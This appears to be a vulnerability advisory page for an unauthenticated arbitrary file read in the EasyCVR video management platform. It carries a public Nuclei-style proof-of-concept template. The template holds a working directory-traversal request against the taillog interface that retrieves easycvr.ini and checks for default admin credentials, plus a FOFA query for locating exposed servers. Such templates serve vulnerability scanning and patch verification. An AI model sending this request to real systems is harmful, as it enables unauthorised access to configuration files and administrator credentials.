easycvr-arbitrary-file-read: EasyCVR Video Management - Arbitrary File Read

日期: 2025-08-01 | 影响软件: EasyCVR Video Management | POC: 已公开

漏洞描述

The EasyCVR-video management platform taillog interface has an arbitrary file read vulnerability. Unauthenticated attackers can use this vulnerability to read important system files (such as database configuration files, system configuration files), database configuration files, etc., which puts the website in an extremely insecure state.

PoC代码[已公开]

id: easycvr-arbitrary-file-read

info:
  name: EasyCVR Video Management - Arbitrary File Read
  author: s4e-io
  severity: high
  description: |
    The EasyCVR-video management platform taillog interface has an arbitrary file read vulnerability. Unauthenticated attackers can use this vulnerability to read important system files (such as database configuration files, system configuration files), database configuration files, etc., which puts the website in an extremely insecure state.
  remediation: |
    Ensure that the application does not allow directory traversal or access to sensitive files through web requests. Implement proper input validation and restrict access to critical files.
  reference:
    - https://mp.weixin.qq.com/s?__biz=MzkyNDY3MTY3MA==&mid=2247486259&idx=1&sn=dd51ca8df3aa1533144b975b9bec3086
  metadata:
    verified: true
    max-request: 2
    fofa-query: icon_hash="458134656"
  tags: easycvr,unauth,lfi,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "<title>EasyCVR")'
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        GET /taillog/oxsecl/..\easycvr.ini HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "default_admin_user", "default_admin_password")'
          - 'contains(content_type, "text/plain")'
          - "status_code == 200"
        condition: and
# digest: 4a0a00473045022100b7b0eb7209f001de1d23e0cce3f62a70fa2c64afe7786a8dd4559b94cc9e811402200de38b4e159afd97a8ecfa00a92d28e247df186d4457c76cbbea60df296ee6b6:922c64590222798bb761d5b6d8e72950